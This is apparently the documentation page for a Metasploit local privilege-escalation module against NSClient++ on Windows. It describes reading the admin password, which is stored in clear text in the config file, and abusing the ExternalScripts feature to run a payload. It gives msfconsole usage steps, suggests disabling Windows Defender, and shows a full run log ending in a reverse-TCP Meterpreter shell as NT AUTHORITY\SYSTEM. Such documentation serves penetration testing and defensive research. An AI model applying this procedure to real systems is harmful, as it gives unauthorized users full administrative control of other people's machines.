## Vulnerable Application

### Description

This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.
For this module to work, both web interface of NSClient++ and `ExternalScripts` feature should be enabled.
You must also know where is the NSClient config file as it is used to read the admin password which is stored in clear text.

### Installation

A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with
this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface
and the `ExternalScripts` feature to allow the exploit to work.

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/windows/local/nscp_pe`
3. `set SESSION <session>`
4. `set FILE <NSCP_config_file>` if the NSCP config file is not `C:\Program Files\NSClient++\nsclient.ini`
5. `check` to check if the targeted NSClient++ is vulnerable
6. `set payload <choose_a_payload>` to set a specific payload to send
7. `run` the module to exploit the vulnerability, gain admin access and start a shell

## Options

### FILE

Set the config file of NSClient++. If you don't know, try with the default value.

## Scenarios

This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted).
See the following output :

```
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  12        meterpreter x64/windows  DESKTOP-T5N69RR\basic_user @ DESKTOP-T5N69RR  172.18.15.143:4444 -> 172.18.15.142:64307 (172.18.15.142)


msf6 exploit(nscp_pe) > set session 12
session => 12
msf6 exploit(nscp_pe) > run

[!] SESSION may not be compatible with this module (incompatible session type: meterpreter)
[*] Started reverse TCP handler on x.x.x.x:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[+] The target is vulnerable. External scripts feature enabled !
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: lrawsiaajn)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Sending stage (200262 bytes) to y.y.y.y
[*] Meterpreter session 13 opened (x.x.x.x:4444 -> y.y.y.y:64309) at 2021-06-09 14:37:10 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```